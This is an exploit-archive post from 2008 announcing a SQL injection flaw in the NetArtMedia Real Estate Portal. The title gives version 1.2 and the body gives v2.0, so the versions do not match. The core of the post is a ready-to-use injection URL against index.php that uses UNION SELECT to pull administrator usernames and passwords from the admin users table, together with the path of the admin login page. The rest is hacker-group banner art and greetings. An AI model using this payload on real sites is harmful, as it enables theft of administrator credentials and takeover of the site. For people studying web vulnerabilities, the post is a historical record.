[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : NetArtMedia Real Estate Portal 1.2 SQL Injection Vulnerability
# Published : 2008-09-21
# Author : Encrypt3d.M!nd
# Previous Title : NetArtMedia Jobs Portal 1.3 Multiple SQL Injection Vulnerabilities
# Next Title : PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit
######## ## ## ###### ######## ## ## ######## ######## ####### ########
## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## #### ## ## ## ## #### ## ## ## ## ## ##
###### ## ## ## ## ######## ## ######## ## ####### ## ##
## ## #### ## ## ## ## ## ## ## ## ##
## ## ### ## ## ## ## ## ## ## ## ## ## ##
######## ## ## ###### ## ## ## ## ## ####### ########
################################ !R4Q!4N H4CK3R ###################################
NetArtMedia Real Estate Portal v2.0 Sql Injection Vulnerability
Website : http://www.netartmedia.net
Founded By : Encrypt3d.M!nd
Home Page : http://encrypt3d.blogspot.com
# Remote Sql Injection(s) :
Affected File :
index.php
PoC:
/index.php?mod=re_search&ad=-666 union select 1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from websiteadmin_admin_users
Administration Panel:
/ADMIN/login.php
# Greetz:
MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
KoRn The Dog,MiNi-SpIder,All My Friends
The EnD :D
# www.Syue.com [2008-09-21]